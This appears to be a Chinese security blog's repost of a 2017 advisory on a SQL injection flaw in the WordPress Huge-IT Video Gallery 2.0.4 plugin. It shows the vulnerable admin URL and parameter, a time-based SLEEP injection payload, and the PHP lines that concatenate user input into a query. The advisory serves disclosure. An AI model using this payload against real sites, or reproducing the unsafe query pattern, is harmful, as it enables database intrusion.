WordPress Huge-IT Video Gallery 2.0.4 SQL注入

Advisory ID: DC-2017-01-009
SQL injection

 Vulnerable Function:    $wpdb->get_var( $query );
  Vulnerable Variable:    $_POST['cat_search']
  Vulnerable URL:       
http://www.vulnerablesite.com/wp-admin/admin.php?page=video_galleries_huge_it_video_gallery
  Vulnerable Body:        cat_search=DefenseCode AND (SELECT * FROM (SELECT(SLEEP(5)))DC)
  File:                   
gallery-video\includes\admin\class-gallery-video-galleries.php
    ---------
    107    $cat_id = sanitize_text_field( $_POST['cat_search'] );
    ...
    118       $where .= " AND sl_width=" . $cat_id;
    ...
    127    $query = "SELECT COUNT(*) FROM " . $wpdb->prefix .
"huge_it_videogallery_galleries" . $where;
    128    $total = $wpdb->get_var( $query );
    ---------

本文固定链接: https://www.unhonker.com/bug/1993.html | 90' s Blog|关注网络信息安全

该日志由 unhonker 于2017年05月30日发表在 漏洞公布 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: WordPress Huge-IT Video Gallery 2.0.4 SQL注入 | 90' s Blog|关注网络信息安全
关键字:

WordPress Huge-IT Video Gallery 2.0.4 SQL注入:等您坐沙发呢!

发表评论

您必须 [ 登录 ] 才能发表留言!